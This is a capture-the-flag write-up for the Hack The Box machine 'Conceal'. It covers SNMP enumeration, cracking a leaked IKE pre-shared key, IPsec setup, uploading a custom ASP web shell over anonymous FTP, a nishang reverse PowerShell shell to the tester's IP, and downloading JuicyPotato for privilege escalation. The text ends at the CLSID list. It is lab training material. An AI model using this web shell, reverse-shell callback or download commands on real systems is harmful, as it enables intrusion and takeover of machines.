Conceal

18/05/2019

Conceal is a great Windows box, where to start we'll have to inspect a snmp server and configure IKE/IPsec to be able to see all the available ports in the machine. Then, to get user we'll have to create and upload a malicious asp file to execute powershell and get a shell on the system. Finally, to escalate privileges, we'll use the JuicyPotato exploit.

User Privilege Escalation

User

If we try to run a simple nmap we'll see all ports seem to be filtered or closed.

root@kali:~/htb/conceal# nmap -sC -sV 10.10.10.116 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 11:54 UTC
Nmap scan report for 10.10.10.116
Host is up (0.057s latency).
All 1000 scanned ports on 10.10.10.116 are filtered

Instead, we're going to run a full masscan to check all ports.

root@kali:~/htb/conceal# masscan -p1-65535,U:1-65535 10.10.10.116 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-03-04 11:58:59 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.116 

We can see only the port 161/udp is open, so now we can use nmap to check what is running there.

root@kali:~/htb/conceal# nmap -sV -sU -p161 10.10.10.116
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 12:13 UTC
Nmap scan report for 10.10.10.116
Host is up (0.058s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
Service Info: Host: Conceal

We have snmp (Simple Network Management Protocol) in the machine. This protocol collects and organizes information about managed devices, so we'll run snmp-check to enumerate the information via snmp.

root@kali:~/htb/conceal# snmp-check 10.10.10.116
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.116
  Hostname                      : Conceal
  Description                   : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  Location                      : -
  Uptime snmp                   : 13:58:55.20
  Uptime system                 : 13:58:19.67
  System date                   : 2019-3-4 12:04:54.5
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  Destitute           
  Administrator       
  DefaultAccount      

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 128
  TCP segments received         : 249336
  TCP segments sent             : 8
  TCP segments retrans          : 4
  Input datagrams               : 445397
  Delivered datagrams           : 378229
  Output datagrams              : 9284

[*] Network interfaces:

  Interface                     : [ up ] Software Loopback Interface 1
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 1073 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IKEv2)
  Id                            : 2
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (PPTP)
  Id                            : 3
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  Id                            : 4
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (L2TP)
  Id                            : 5
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Teredo Tunneling Pseudo-Interface
  Id                            : 6
  Mac Address                   : 00:00:00:00:00:00
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IP)
  Id                            : 7
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (SSTP)
  Id                            : 8
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IPv6)
  Id                            : 9
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection
  Id                            : 10
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466

  Interface                     : [ down ] WAN Miniport (PPPOE)
  Id                            : 11
  Mac Address                   : :::::
  Type                          : ppp
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (Network Monitor)
  Id                            : 12
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000
  Id                            : 13
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000
  Id                            : 14
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000
  Id                            : 15
  Mac Address                   : 00:50:56:b9:8d:4c
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 244445065
  Out octets                    : 930466


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  10                    10.10.10.116          255.255.255.0         1                   
  1                     127.0.0.1             255.0.0.0             1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               281                 
  10.10.10.0            10.10.10.116          255.255.255.0         281                 
  10.10.10.116          10.10.10.116          255.255.255.255       281                 
  10.10.10.255          10.10.10.116          255.255.255.255       281                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  0.0.0.0               56854               
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          64308               
  127.0.0.1             1900                
  127.0.0.1             64309               

[*] Network services:

  Index                 Name                
  0                     Power               
  1                     Server              
  2                     Themes              
  3                     IP Helper           
  4                     DNS Client          
  5                     Data Usage          
  6                     Superfetch          
  7                     DHCP Client         
  8                     Time Broker         
  9                     TokenBroker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    VMware Tools        
  14                    Windows Time        
  15                    CoreMessaging       
  16                    Plug and Play       
  17                    Print Spooler       
  18                    Windows Audio       
  19                    SSDP Discovery      
  20                    Task Scheduler      
  21                    Windows Search      
  22                    Security Center     
  23                    Storage Service     
  24                    Windows Firewall    
  25                    CNG Key Isolation   
  26                    COM+ Event System   
  27                    Windows Event Log   
  28                    IPsec Policy Agent  
  29                    Geolocation Service 
  30                    Group Policy Client 
  31                    RPC Endpoint Mapper 
  32                    Data Sharing Service
  33                    Device Setup Manager
  34                    Network List Service
  35                    System Events Broker
  36                    User Profile Service
  37                    Base Filtering Engine
  38                    Local Session Manager
  39                    Microsoft FTP Service
  40                    TCP/IP NetBIOS Helper
  41                    Cryptographic Services
  42                    Tile Data model server
  43                    COM+ System Application
  44                    Diagnostic Service Host
  45                    Shell Hardware Detection
  46                    State Repository Service
  47                    Diagnostic Policy Service
  48                    Network Connection Broker
  49                    Security Accounts Manager
  50                    Network Location Awareness
  51                    Windows Connection Manager
  52                    Windows Font Cache Service
  53                    Remote Procedure Call (RPC)
  54                    DCOM Server Process Launcher
  55                    Windows Audio Endpoint Builder
  56                    Application Host Helper Service
  57                    Network Store Interface Service
  58                    Client License Service (ClipSVC)
  59                    Distributed Link Tracking Client
  60                    System Event Notification Service
  61                    World Wide Web Publishing Service
  62                    Connected Devices Platform Service
  63                    Windows Defender Antivirus Service
  64                    Windows Management Instrumentation
  65                    Windows Process Activation Service
  66                    Distributed Transaction Coordinator
  67                    IKE and AuthIP IPsec Keying Modules
  68                    Microsoft Account Sign-in Assistant
  69                    VMware CAF Management Agent Service
  70                    VMware Physical Disk Helper Service
  71                    Background Intelligent Transfer Service
  72                    Background Tasks Infrastructure Service
  73                    Program Compatibility Assistant Service
  74                    VMware Alias Manager and Ticket Service
  75                    Connected User Experiences and Telemetry
  76                    WinHTTP Web Proxy Auto-Discovery Service
  77                    Windows Defender Security Centre Service
  78                    Windows Push Notifications System Service
  79                    Windows Defender Antivirus Network Inspection Service
  80                    Windows Driver Foundation - User-mode Driver Framework

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  280                   running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork
  312                   running               smss.exe                                                        
  352                   running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted
  396                   running               csrss.exe                                                       
  476                   running               wininit.exe                                                     
  496                   running               csrss.exe                                                       
  576                   running               winlogon.exe                                                    
  600                   running               services.exe                                                    
  628                   running               lsass.exe             C:\Windows\system32\                      
  708                   running               fontdrvhost.exe                                                 
  716                   running               fontdrvhost.exe                                                 
  724                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch       
  824                   running               svchost.exe           C:\Windows\system32\  -k RPCSS            
  840                   running               svchost.exe           C:\Windows\system32\  -k LocalService     
  928                   running               dwm.exe                                                         
  944                   running               svchost.exe           C:\Windows\system32\  -k netsvcs          
  1000                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1052                  running               svchost.exe           C:\Windows\System32\  -k NetworkService   
  1116                  running               vmacthlp.exe          C:\Program Files\VMware\VMware Tools\                      
  1200                  running               SearchProtocolHost.exe  C:\Windows\system32\  Global\UsGthrFltPipeMssGthrPipe166_ Global\UsGthrCtrlFltPipeMssGthrPipe166 1 -2147483646 "Software\Microsoft\Windows Search" "M
  1288                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1348                  running               Memory Compression                                              
  1356                  running               dllhost.exe           C:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
  1400                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1408                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted
  1520                  running               spoolsv.exe           C:\Windows\System32\                      
  1772                  running               svchost.exe           C:\Windows\system32\  -k apphost          
  1792                  running               svchost.exe           C:\Windows\System32\  -k utcsvc           
  1808                  running               svchost.exe           C:\Windows\system32\  -k ftpsvc           
  1852                  running               SearchFilterHost.exe  C:\Windows\system32\  0 692 696 704 8192 700
  1876                  running               SecurityHealthService.exe                                            
  1900                  running               snmp.exe              C:\Windows\System32\                      
  1916                  running               svchost.exe           C:\Windows\system32\  -k iissvcs          
  1924                  running               vmtoolsd.exe          C:\Program Files\VMware\VMware Tools\                      
  1932                  running               VGAuthService.exe     C:\Program Files\VMware\VMware Tools\VMware VGAuth\                      
  1940                  running               ManagementAgentHost.exe  C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\                      
  1952                  running               MsMpEng.exe                                                     
  1980                  running               LogonUI.exe                                 /flags:0x0 /state0:0xa39d1055 /state1:0x41c64e6d
  2576                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted
  2728                  running               SearchIndexer.exe     C:\Windows\system32\  /Embedding          
  3012                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      
  3184                  running               NisSrv.exe                                                      
  3356                  running               msdtc.exe             C:\Windows\System32\                      
  3692                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceAndNoImpersonation
  3748                  running               svchost.exe                                                     
  3844                  running               svchost.exe           C:\Windows\system32\  -k appmodel         
  4068                  running               svchost.exe           C:\Windows\system32\  -k LocalSystemNetworkRestricted

[*] Storage information:

  Description                   : ["C:\\ Label:  Serial Number 9606be7b"]
  Device id                     : [#<SNMP::Integer:0x0000563458c29c90 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458c27df0 @value=4096>]
  Memory size                   : 59.51 GB
  Memory used                   : 10.85 GB

  Description                   : ["D:\\"]
  Device id                     : [#<SNMP::Integer:0x0000563458c1a6a0 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458c18990 @value=0>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes

  Description                   : ["Virtual Memory"]
  Device id                     : [#<SNMP::Integer:0x0000563458bfb2f0 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458bf9518 @value=65536>]
  Memory size                   : 3.12 GB
  Memory used                   : 794.69 MB

  Description                   : ["Physical Memory"]
  Device id                     : [#<SNMP::Integer:0x0000563458be7ea8 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0000563458be60f8 @value=65536>]
  Memory size                   : 2.00 GB
  Memory used                   : 703.06 MB


[*] File system information:

  Index                         : 1
  Mount point                   : 
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 0

[*] Device information:

  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Microsoft Shared Fax Driver
  4                     unknown               running               Unknown Processor Type
  5                     unknown               running               Unknown Processor Type
  6                     unknown               unknown               Software Loopback Interface 1
  7                     unknown               unknown               WAN Miniport (IKEv2)
  8                     unknown               unknown               WAN Miniport (PPTP) 
  9                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  10                    unknown               unknown               WAN Miniport (L2TP) 
  11                    unknown               unknown               Teredo Tunneling Pseudo-Interface
  12                    unknown               unknown               WAN Miniport (IP)   
  13                    unknown               unknown               WAN Miniport (SSTP) 
  14                    unknown               unknown               WAN Miniport (IPv6) 
  15                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection
  16                    unknown               unknown               WAN Miniport (PPPOE)
  17                    unknown               unknown               WAN Miniport (Network Monitor)
  18                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer
  19                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-
  20                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer L
  21                    unknown               unknown               D:\                 
  22                    unknown               running               Fixed Disk          
  23                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)

[*] Software components:

  Index                 Name                
  1                     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  2                     VMware Tools        
  3                     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

[*] IIS server information:

  TotalBytesSentLowWord         : 0
  TotalBytesReceivedLowWord     : 0
  TotalFilesSent                : 0
  CurrentAnonymousUsers         : 0
  CurrentNonAnonymousUsers      : 0
  TotalAnonymousUsers           : 0
  TotalNonAnonymousUsers        : 0
  MaxAnonymousUsers             : 0
  MaxNonAnonymousUsers          : 0
  CurrentConnections            : 0
  MaxConnections                : 0
  ConnectionAttempts            : 0
  LogonAttempts                 : 0
  Gets                          : 0
  Posts                         : 0
  Heads                         : 0
  Others                        : 0
  CGIRequests                   : 0
  BGIRequests                   : 0
  NotFoundErrors                : 0

In the output we have a lot of interesting information, such as users, services running and devices, but what we'll focus on is the system contact field (IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43).

IKE (Internet Key Exchange) is the protocol used to set up a security association (SA) in the IPsec protocol suite.

We have the hashed Pre-Shared Key (PSK), so we'll use hashcat to retrieve the password.

root@kali:~/htb/conceal# hashcat -m 1000 -a 0 pass /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...
9c8b1a372b1878851be2c097031b6e43:Dudecake1!

Now we need to find the connection configuration, so we'll use ike-scan.

root@kali:~/htb/conceal# ike-scan 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116	Main Mode Handshake returned HDR=(CKY-R=cc81ff8b4dbf4806) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8) VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T) VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n) VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation) VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable) VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

With this output we can confirm the IKE uses:

To connect through IPsec we'll use strongswan and to apply the configuration we'll use this guide to create the following connection in the configuration file /etc/ipsec.conf.

conn conceal
	authby=psk
	auto=start
	esp=3des-sha1
	ike=3des-sha1-modp1024
	keyexchange=ikev1
	type=transport
	right=10.10.10.116
	rightsubnet=10.10.10.116[tcp/]

We also have to add the password we found before in /etc/ipsec.secrets.

10.10.10.116 : PSK "Dudecake1!"

Now we start the ipsec service and if we check the status we should see something like this.

root@kali:~/htb/conceal# ipsec start
Starting strongSwan 5.7.2 IPsec [starter]...
root@kali:~/htb/conceal# ipsec status
Security Associations (1 up, 0 connecting):
     conceal[1]: ESTABLISHED 1 second ago, 10.10.16.38[10.10.16.38]...10.10.10.116[10.10.10.116]
     conceal{1}:  INSTALLED, TRANSPORT, reqid 1, ESP SPIs: c99933cf_i c3024e80_o
     conceal{1}:   10.10.16.38/32 === 10.10.10.116/32[tcp]

In the snmp-check output we saw we had services running in ports: 21 80 135 445 49664 49665 49666 49667 49668 49669 49670 139.

We'll start inspecting what's running on port 21, probably an ftp.

Indeed, we have an ftp server and we can login as an anonymous user but there's nothing there.

root@kali:~/htb/conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

But we can upload files, so it could be helpful later.

ftp> put caca
local: caca remote: caca
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (117.1875 kB/s)

Let's move to port 80 where we seem to have an IIS running.

If we run gobuster we should see a directory /upload is available.

root@kali:~/htb/conceal# /opt/gobuster/gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.116/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.116/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/03/04 16:32:03 Starting gobuster
=====================================================
/upload (Status: 301)
=====================================================
2019/03/04 16:33:40 Finished
=====================================================

There we have a directory listing with the file we uploaded to the ftp server.

If we visit a page that doesn't exist we get the following error page.

Here we can see the path where the files are being stored C:\inetpub\wwwroot\upload\dasds.

I tried to create malicious asp files via msfvenom but didn't work for me, so I finally did my own custom asp file which executes commands in the machine, stores the output in a file and then prints the content of that file in the page.

<%
Set oWSH = Server.CreateObject("WScript.Shell")
Call oWSH.Run ("cmd.exe /c dir > C:\inetpub\wwwroot\upload\caca", 0, True)

Set fso  = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("C:\inetpub\wwwroot\upload\caca", 1)
text = file.ReadAll
file.Close
%>
<%= text %>

Upload it via ftp.

ftp> put shell.asp

And if we access to http://10.10.10.116/upload/shell.asp we see the output of the dir command.

Now to retrieve a shell, we'll use nishang Invoke-PowerShellTcp.ps1 script adding the following line at the end to execute it.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.38 -Port 6969

Modify the asp file to execute our PS script.

<%
Set oWSH = Server.CreateObject("WScript.Shell")
Call oWSH.Run ("cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\inetpub\wwwroot\upload\Invoke-PowerShellTcp.ps1", 0, True)
%>

Upload the PS script and the asp file via ftp.

ftp> put shell.asp
ftp> put Invoke-PowerShellTcp.ps1

Now if we access to http://10.10.10.116/upload/shell.asp and listen on the specified port we should get a PowerShell shell as conceal.

root@kali:~/htb/conceal# nc -nlvp 6969
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6969
Ncat: Listening on 0.0.0.0:6969
Ncat: Connection from 10.10.10.116.
Ncat: Connection from 10.10.10.116:49675.
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>

In Destitute's desktop we have the user flag.

PS C:\Users\Destitute\Desktop> type proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

If we check user privileges we can see SeImpersonatePrivilege is enabled.

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

With this privilege enabled we should be able to escalate privileges via RottenPotato but I tried and I didn't make it work, so I used Juicy Potato which allows to change the COM server to abuse (default is BITS).

First, we need to find a valid CLSID for this machine, so download the list of CLSID for Windows 10 Enterprise, the bat file and the exe from github and move them to Conceal.

PS C:\Users\Public> (New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/CLSID.list","C:\Users\Public\CLSID.list")
PS C:\Users\Public> (New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/test_clsid.bat","C:\Users\Public\test_clsid.bat")
PS C:\Users\Public> (New-Object System.Net.WebClient).DownloadFile("http://10.10.16.38/JuicyPotato.exe","C:\Users\Public\JuicyPotato.exe")

Now execute the bat which will check which CLSID are valid for this machine.

PS C:\Users\Public> C:\Users\Public\test_clsid.bat

After a couple of minutes we should have the output in result.log. Here we have to pick one that runs as NT AUTHORITY\SYSTEM.

PS C:\Users\Public> type result.log                   
{0289a7c5-91bf-4547-81ae-fec91a89dec5};CONCEAL\Destitute
{98068995-54d2-4136-9bc9-6dbcb0a4683f};CONCEAL\Destitute
{9acf41ed-d457-4cc1-941b-ab02c26e4686};CONCEAL\Destitute
{9678f47f-2435-475c-b24a-4606f8161c16};CONCEAL\Destitute
{417976B7-917D-4F1E-8F14-C18FCCB0B3A8};CONCEAL\Destitute
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM
{B441840A-5CEF-42F1-BE06-4E31A90E74D7};NT AUTHORITY\LOCAL SERVICE
{B7BC3EB9-B145-4574-B729-7D78126EB4C8};NT AUTHORITY\LOCAL SERVICE
{A8BE33B3-D275-459B-A853-A2150531C8B3};NT AUTHORITY\LOCAL SERVICE
{9694B5A2-54CE-4837-BA0A-F52FD7699F12};NT AUTHORITY\LOCAL SERVICE
{A0D76288-0FB2-477A-96F9-F7EFFD7ED5D3};NT AUTHORITY\LOCAL SERVICE
{CC9FA1A3-ADDE-49A9-B435-34CE6E5DA3DB};NT AUTHORITY\LOCAL SERVICE
{F1B75166-312C-4DC6-BA41-C2E2486C9913};NT AUTHORITY\LOCAL SERVICE
{F94358B1-E9AE-4D5C-AF66-CE50E67803C7};NT AUTHORITY\LOCAL SERVICE
{EA5EAA7B-1E81-4C76-BF2D-F2A867F764A1};NT AUTHORITY\LOCAL SERVICE
{DAB26424-5F5C-4834-8685-A4DB44DF8083};NT AUTHORITY\LOCAL SERVICE
{DF175E5E-5488-49B7-BCB9-B7204933E26F};NT AUTHORITY\LOCAL SERVICE
{4D098DC6-3080-4A11-9887-4C77FD7C2ED2};NT AUTHORITY\LOCAL SERVICE
{46B559E9-0D2F-44AC-9EE7-AE6D9384B292};NT AUTHORITY\LOCAL SERVICE
{557C6CBF-CD77-45CF-84E8-8F5A8A331BAD};NT AUTHORITY\LOCAL SERVICE
{37998346-3765-45B1-8C66-AA88CA6B20B8};NT AUTHORITY\LOCAL SERVICE
{206490E7-09B5-4C9D-8E54-254B87A5CEAF};NT AUTHORITY\LOCAL SERVICE
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029};NT AUTHORITY\LOCAL SERVICE
{235EB944-F722-47DB-8EE7-1EE27A8D4F98};NT AUTHORITY\LOCAL SERVICE
{21F282D1-A881-49E1-9A3A-26E44E39B86C};NT AUTHORITY\LOCAL SERVICE
{7ECB3DBE-742D-4B43-BF3E-2587BE1BFF72};NT AUTHORITY\LOCAL SERVICE
{770FDC97-76E7-4067-B14C-2DDB3A7517F2};NT AUTHORITY\LOCAL SERVICE
{8190FA8C-3A62-49FB-B145-071B4B74578D};NT AUTHORITY\LOCAL SERVICE
{7ECC8054-7AE3-486D-9CBA-8ED0B5ED61AC};NT AUTHORITY\LOCAL SERVICE
{754EC012-E0B0-4F32-A810-77F639CBF103};NT AUTHORITY\LOCAL SERVICE
{73978CED-828C-49AB-A403-9ABACDCE1505};NT AUTHORITY\LOCAL SERVICE
{680442B0-692A-465C-B47D-783C4EC5B6A2};NT AUTHORITY\LOCAL SERVICE
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
{42CBFAA7-A4A7-47BB-B422-BD10E9D02700};NT AUTHORITY\SYSTEM
{42C21DF5-FB58-4102-90E9-96A213DC7CE8};NT AUTHORITY\SYSTEM
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744};NT AUTHORITY\SYSTEM
{C63261E4-6052-41FF-B919-496FECF4C4E5};NT AUTHORITY\SYSTEM
{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\LOCAL SERVICE
{08D9DFDF-C6F7-404A-A20F-66EEC0A609CD};NT AUTHORITY\SYSTEM
{22f5b1df-7d7a-4d21-97f8-c21aefba859c};NT AUTHORITY\LOCAL SERVICE
{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\LOCAL SERVICE
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
{581333F6-28DB-41BE-BC7A-FF201F12F3F6};NT AUTHORITY\LOCAL SERVICE
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\SYSTEM
{687e55ca-6621-4c41-b9f1-c0eddc94bb05};NT AUTHORITY\SYSTEM
{B31118B2-1F49-48E5-B6F5-BC21CAEC56FB};NT AUTHORITY\SYSTEM
{6d8ff8e5-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{204810b9-73b2-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e1-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e7-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{2e5e84e9-4049-4244-b728-2d24227157c7};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dd-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8df-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8d2-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dc-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{0fb40f0d-1021-4022-8da0-aab0588dfc8b};NT AUTHORITY\LOCAL SERVICE
